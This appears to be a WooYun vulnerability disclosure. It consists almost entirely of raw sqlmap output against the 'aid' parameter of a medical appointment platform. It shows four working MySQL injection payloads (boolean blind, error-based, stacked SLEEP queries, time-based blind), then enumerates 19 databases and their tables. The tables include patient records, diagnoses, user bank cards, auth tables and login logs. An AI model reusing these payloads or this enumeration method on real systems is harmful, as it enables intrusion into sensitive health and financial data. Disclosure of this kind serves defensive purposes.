WooYun.org

Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=734' AND 6072=6072 AND 'iEao'='iEao
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: aid=734' AND (SELECT 5706 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(5706=5706,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mgKj'='mgKj
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: aid=734';(SELECT * FROM (SELECT(SLEEP(5)))PfLV)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: aid=734' AND (SELECT * FROM (SELECT(SLEEP(5)))YeFt) AND 'RCiv'='RCiv
---
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0
available databases [19]:
[*] db_admin
[*] db_api
[*] db_auth
[*] db_bug
[*] db_doctor
[*] db_file
[*] db_log
[*] db_msg
[*] db_query
[*] db_room
[*] db_sys
[*] db_uc
[*] db_uc_web
[*] db_user
[*] db_user_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: db_admin
[16 tables]
+----------------------------------------------+
| t_admin_article                              |
| t_admin_article_picture                      |
| t_admin_banner_picture                       |
| t_admin_info                                 |
| t_admin_level                                |
| t_admin_login_info                           |
| t_admin_operation_info                       |
| t_admin_programa                             |
| t_admin_work_calender                        |
| t_admin_work_notice                          |
| t_doctor_admin_appointment                   |
| t_user_question_answer                       |
| t_user_question_info                         |
| t_website_column_info                        |
| t_website_content                            |
| t_website_leave_msg                          |
+----------------------------------------------+
Database: db_log
[33 tables]
+----------------------------------------------+
| t_log_ad_click                               |
| t_log_admin_op                               |
| t_log_admin_work_calender                    |
| t_log_apns_push                              |
| t_log_apns_push_count                        |
| t_log_apns_push_fail                         |
| t_log_diagnosis_record                       |
| t_log_diagnosis_record_sugguest              |
| t_log_doctor_appointment                     |
| t_log_doctor_appointment_dt                  |
| t_log_doctor_assistant_phone                 |
| t_log_doctor_refuse_inquiry                  |
| t_log_doctor_withdrawal                      |
| t_log_input_medical_record                   |
| t_log_msg                                    |
| t_log_patient_activist_info                  |
| t_log_patient_auxiliary_check                |
| t_log_patient_auxiliary_record               |
| t_log_patient_diagnosis_evaluate             |
| t_log_pwd_retrieve                           |
| t_log_receipt                                |
| t_log_tns                                    |
| t_log_user_account_freeze                    |
| t_log_user_active                            |
| t_log_user_login                             |
| t_log_user_online                            |
| t_log_user_online_count                      |
| t_log_user_refund_op                         |
| t_log_user_refund_order                      |
| t_log_user_reg                               |
| t_log_user_reg_count                         |
| t_log_user_sms                               |
| t_log_user_value_change                      |
+----------------------------------------------+
Database: db_auth
[4 tables]
+----------------------------------------------+
| t_auth_group                                 |
| t_auth_group_access                          |
| t_auth_rule                                  |
| t_user                                       |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: db_bug
[3 tables]
+----------------------------------------------+
| t_log_android_bugs                           |
| t_log_ios_bugs                               |
| t_server_gk_ip                               |
+----------------------------------------------+
Database: db_sys
[11 tables]
+----------------------------------------------+
| t_client_version_info                        |
| t_pes_info                                   |
| t_pgks_info                                  |
| t_sys_ad_cfg                                 |
| t_sys_auxiliary_cfg                          |
| t_sys_auxiliary_cfg_copy                     |
| t_sys_channel_cfg                            |
| t_sys_nation_cfg                             |
| t_sys_picture                                |
| t_sys_process_cfg                            |
| t_sys_province                               |
+----------------------------------------------+
Database: db_doctor
[43 tables]
+----------------------------------------------+
| 医生信息                                         |
| 医院信息                                         |
| t_appointment_auxiliary_check                |
| t_appointment_diagnosis_picture              |
| t_appointment_material_remind                |
| t_assistant_doctor_info                      |
| t_department_disease_cfg                     |
| t_disease_auxiliary_check                    |
| t_doctor_appointment                         |
| t_doctor_appointment_apply                   |
| t_doctor_appointment_dt                      |
| t_doctor_appointment_ex                      |
| t_doctor_appointment_label                   |
| t_doctor_appointment_tourist                 |
| t_doctor_appointment_upd                     |
| t_doctor_auxiliary_check                     |
| t_doctor_case                                |
| t_doctor_cure_disease                        |
| t_doctor_department_apply                    |
| t_doctor_department_info                     |
| t_doctor_department_picture                  |
| t_doctor_diagnosis_record                    |
| t_doctor_disease_detail                      |
| t_doctor_hospital_info                       |
| t_doctor_info                                |
| t_doctor_message                             |
| t_doctor_power                               |
| t_doctor_recommend_pool                      |
| t_doctor_refuse_inquiry                      |
| t_doctor_team_fees                           |
| t_doctor_withdrawal                          |
| t_label_info                                 |
| t_medical_record_remark                      |
| t_patient_activist_info                      |
| t_patient_auxiliary_check                    |
| t_patient_diagnosis_evaluate                 |
| t_patient_drug_plan                          |
| t_patient_history_info                       |
| t_patient_info                               |
| t_patient_operation_plan                     |
| t_patient_physical_plan                      |
| t_patient_visit_record                       |
| v_doctor_base_info                           |
+----------------------------------------------+
Database: db_msg
[3 tables]
+----------------------------------------------+
| t_appointment_pecipe_msg                     |
| t_msg_cache                                  |
| t_msg_ios_devicetoken                        |
+----------------------------------------------+
Database: db_room
[1 table]
+----------------------------------------------+
| t_room_record                                |
+----------------------------------------------+
Database: db_api
[4 tables]
+----------------------------------------------+
| t_api_config                                 |
| t_api_info                                   |
| t_api_token                                  |
| t_tns_push                                   |
+----------------------------------------------+
Current database
[1 table]
+----------------------------------------------+
| t_patient_order_info                         |
+----------------------------------------------+
Database: db_uc_web
[2 tables]
+----------------------------------------------+
| t_user_refund_op                             |
| t_user_refund_order                          |
+----------------------------------------------+
Database: db_user_web
[3 tables]
+----------------------------------------------+
| t_user_bank_card                             |
| t_user_collect                               |
| t_user_label                                 |
+----------------------------------------------+
Database: db_user
[5 tables]
+----------------------------------------------+
| t_user_authen                                |
| t_user_location                              |
| t_user_profile                               |
| t_user_status                                |
| v_user_base_info                             |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: db_uc
[7 tables]
+----------------------------------------------+
| t_doctor_bill                                |
| t_user_account_freeze                        |
| t_user_commonpay_receipt                     |
| t_user_config                                |
| t_user_currency_value                        |
| t_user_recharge_record                       |
| t_user_refund_order                          |
+----------------------------------------------+
Database: db_file
[1 table]
+----------------------------------------------+
| t_file                                       |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| None                                         |
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_BUFFER_PAGE                           |
| INNODB_BUFFER_PAGE_LRU                       |
| INNODB_BUFFER_POOL_STATS                     |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+
Database: db_query
[15 tables]
+----------------------------------------------+
| t_sys_reg_time_bucket                        |
| t_sys_sms_info                               |
| t_sys_sms_receive_dt                         |
| t_uid_account                                |
| t_uid_assign                                 |
| t_uid_release_cfg                            |
| t_uid_release_info                           |
| t_uid_unassign                               |
| t_user_avatar_authen                         |
| t_user_device_install                        |
| t_user_kefu_notice                           |
| t_user_login                                 |
| t_user_power_info                            |
| t_user_sms_shield                            |
| t_user_uninstall                             |
+----------------------------------------------+